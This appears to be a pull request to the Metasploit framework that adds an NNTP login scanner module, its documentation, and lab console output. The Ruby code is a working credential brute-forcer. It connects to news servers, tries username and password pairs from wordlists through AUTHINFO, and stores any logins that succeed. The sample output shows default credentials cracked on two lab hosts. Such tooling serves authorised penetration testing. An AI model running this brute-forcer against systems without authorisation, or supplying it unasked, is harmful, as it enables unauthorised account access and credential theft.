### PR TITLE
Add ye olde NNTP Login Utility scanner module

### DIFF
--- a/documentation/modules/auxiliary/scanner/nntp/nntp_login.md
+++ b/documentation/modules/auxiliary/scanner/nntp/nntp_login.md
@@ -1,0 +1,42 @@
+## Description
+
+  This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
+
+  This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
+
+  If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
+  * [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
+  * [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
+
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/nntp/nntp_login`
+  2. Do: `set RHOSTS [IP]`
+  3. Do: `set RPORT [IP]`
+  4. Do: `run`
+
+
+## Scenarios
+
+  ```
+  msf auxiliary(nntp_login) > run
+
+  [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
+  [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
+  [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
+  [*] Scanned 1 of 2 hosts (50% complete)
+  [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
+  [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
+  [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
+  [*] Scanned 2 of 2 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+

--- a/modules/auxiliary/scanner/nntp/nntp_login.rb
+++ b/modules/auxiliary/scanner/nntp/nntp_login.rb
@@ -1,0 +1,189 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NNTP Login Utility',
+      'Description' => %q{
+        This module attempts to authenticate to NNTP services
+        which support the AUTHINFO authentication extension.
+
+        This module supports AUTHINFO USER/PASS authentication,
+        but does not support AUTHINFO GENERIC or AUTHINFO SASL
+        authentication methods.
+      },
+      'Author'      => 'Brendan Coles <bcoles[at]gmail.com>',
+      'License'     => MSF_LICENSE,
+      'References'  => [ [ 'CVE', '1999-0502' ], # Weak password
+                         [ 'URL', 'https://tools.ietf.org/html/rfc3977' ],
+                         [ 'URL', 'https://tools.ietf.org/html/rfc4642' ],
+                         [ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))
+    register_options(
+      [
+        Opt::RPORT(119),
+        OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',
+          File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),
+        OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',
+          File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])
+      ])
+    deregister_options 'RHOST'
+  end
+
+  def run_host(ip)
+    begin
+      connect
+      return :abort unless nntp?
+      return :abort unless supports_authinfo?
+
+      report_service :host  => rhost,
+                     :port  => rport,
+                     :proto => 'tcp',
+                     :name  => 'nntp'
+      disconnect
+
+      each_user_pass { |user, pass| do_login user, pass }
+    rescue ::Interrupt
+      raise $ERROR_INFO
+    rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error "#{peer} Connection failed"
+      return
+    rescue OpenSSL::SSL::SSLError => e
+      print_error "SSL negotiation failed: #{e}"
+    rescue => e
+      print_error "#{peer} Error: #{e.class} #{e} #{e.backtrace}"
+      return
+    ensure
+      disconnect
+    end
+  end
+
+  def nntp?
+    banner = sock.get_once
+
+    if !banner
+      vprint_error "#{peer} No response"
+      return false
+    end
+
+    if banner !~ /^200/
+      print_error 'Unexpected reply'
+      return false
+    end
+
+    vprint_status 'Server is a NTTP server'
+    vprint_status "Banner: #{banner}"
+    true
+  end
+
+  def supports_authinfo?
+    sock.put "HELP\r\n"
+    res = sock.get(-1)
+    code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+
+    if code.nil?
+      print_error 'Server is not a NNTP server'
+      return false
+    end
+
+    if code == 480
+      vprint_warning 'Authentication is required before listing authentication capabilities.'
+      return true
+    end
+
+    if code == 100 && res =~ /authinfo/i
+      vprint_status 'Server supports AUTHINFO'
+      return true
+    end
+
+    print_error 'Server does not support AUTHINFO'
+    false
+  end
+
+  def do_login(user, pass)
+    vprint_status "Trying username:'#{user}' with password:'#{pass}'"
+
+    begin
+      connect
+      sock.get_once
+
+      sock.put "AUTHINFO USER #{user}\r\n"
+      res = sock.get_once
+      unless res
+        vprint_error "#{peer} No response"
+        return :abort
+      end
+
+      code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+      if code != 381
+        vprint_error "#{peer} Unexpected reply. Skipping user..."
+        return :skip_user
+      end
+
+      sock.put "AUTHINFO PASS #{pass}\r\n"
+      res = sock.get_once
+      unless res
+        vprint_error "#{peer} No response"
+        return :abort
+      end
+
+      code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+      if code == 452 || code == 481
+        vprint_error "#{peer} Login failed"
+        return
+      elsif code == 281
+        print_good "#{peer} Successful login with: '#{user}' : '#{pass}'"
+        report_cred ip:           rhost,
+                    port:         rport,
+                    service_name: 'nntp',
+                    user:         user,
+                    password:     pass,
+                    proof:        code.to_s
+        return :next_user
+      else
+        vprint_error "#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}"
+        return
+      end
+    rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
+      print_error 'Connection failed'
+      return
+    rescue OpenSSL::SSL::SSLError => e
+      print_error "SSL negotiation failed: #{e}"
+      return :abort
+    end
+  rescue => e
+    print_error "Error: #{e}"
+    return nil
+  ensure
+    disconnect
+  end
+
+  def report_cred(opts)
+    service_data = { address: opts[:ip],
+                     port: opts[:port],
+                     service_name: opts[:service_name],
+                     protocol: 'tcp',
+                     workspace_id: myworkspace_id }
+
+    credential_data = { origin_type: :service,
+                        module_fullname: fullname,
+                        username: opts[:user],
+                        private_data: opts[:password],
+                        private_type: :password }.merge service_data
+
+    login_data = { last_attempted_at: DateTime.now,
+                   core: create_credential(credential_data),
+                   status: Metasploit::Model::Login::Status::SUCCESSFUL,
+                   proof: opts[:proof] }.merge service_data
+
+    create_credential_login login_data
+  end
+end


### PR DESCRIPTION
This PR adds a remote scanner module to brute-force valid user credentials for NNTP services.

        This module attempts to authenticate to NNTP services
        which support the AUTHINFO authentication extension.

        This module supports AUTHINFO USER/PASS authentication,
        but does not support AUTHINFO GENERIC or AUTHINFO SASL
        authentication methods.

Tested with:

* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/nntp/nntp_login `
- [x] `set RHOSTS [RHOST]`
- [x] `set RPORT 119`
- [x] `run`
- [x] **Verify** the module tries to brute force valid credentials
- [x] `set RPORT 563`
- [x] `set SSL true`
- [x] `run`
- [x] **Verify** the module tries to brute force valid credentials over SSL

### Sample Output

```
msf > use auxiliary/scanner/nntp/nntp_login 
msf auxiliary(nntp_login) > set rhosts 172.16.191.166 172.16.191.213
rhosts => 172.16.191.166 172.16.191.213
msf auxiliary(nntp_login) > set user_file /root/users
user_file => /root/users
msf auxiliary(nntp_login) > set pass_file /root/pw
pass_file => /root/pw
msf auxiliary(nntp_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(nntp_login) > run

[*] 172.16.191.166:119 - Server is a NTTP server
[*] 172.16.191.166:119 - Banner: 200 SurgeNews win-sgbsd5tqutq (Version 2.0a-13) http://surgenews.com posting OK
[*] 172.16.191.166:119 - Server supports AUTHINFO
[*] 172.16.191.166:119 - Trying username:'asdf' with password:'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[!] 172.16.191.166:119 - No active DB -- Credential data will not be saved!
[*] 172.16.191.166:119 - Trying username:'zxcv' with password:'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[*] 172.16.191.166:119 - Trying username:'admin' with password:'admin'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [03/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'test' with password:'test'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] 172.16.191.166:119 - Trying username:'user' with password:'user'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [05/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'admin' with password:'pass'
[-] 172.16.191.166:119 - Connection failed
[*] 172.16.191.166:119 - Trying username:'admin' with password:'password'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [07/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'admin' with password:'123456'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [08/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'user' with password:'admin'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [09/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'user' with password:'pass'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [10/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'user' with password:'password'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [11/24] - Login failed
[*] 172.16.191.166:119 - Trying username:'user' with password:'123456'
[-] 172.16.191.166:119 - 172.16.191.166:119 - [12/24] - Login failed
[*] Scanned 1 of 2 hosts (50% complete)
[*] 172.16.191.213:119 - Server is a NTTP server
[*] 172.16.191.213:119 - Banner: 200 server.example.net InterNetNews NNRP server INN 2.5.4 ready (no posting)
[*] 172.16.191.213:119 - Server supports AUTHINFO
[*] 172.16.191.213:119 - Trying username:'asdf' with password:'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[!] 172.16.191.213:119 - No active DB -- Credential data will not be saved!
[*] 172.16.191.213:119 - Trying username:'zxcv' with password:'zxcv'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [02/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'admin' with password:'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[*] 172.16.191.213:119 - Trying username:'test' with password:'test'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [04/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'user' with password:'user'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [05/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'zxcv' with password:'admin'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [06/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'zxcv' with password:'pass'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [07/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'zxcv' with password:'password'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [08/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'zxcv' with password:'123456'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [09/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'test' with password:'admin'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [10/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'test' with password:'pass'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [11/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'test' with password:'password'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [12/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'test' with password:'123456'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [13/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'user' with password:'admin'
[-] 172.16.191.213:119 - 172.16.191.213:119 - [14/24] - Login failed
[*] 172.16.191.213:119 - Trying username:'user' with password:'pass'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

```
msf auxiliary(nntp_login) > set verbose false
verbose => false
msf auxiliary(nntp_login) > run

[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] Scanned 1 of 2 hosts (50% complete)
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```
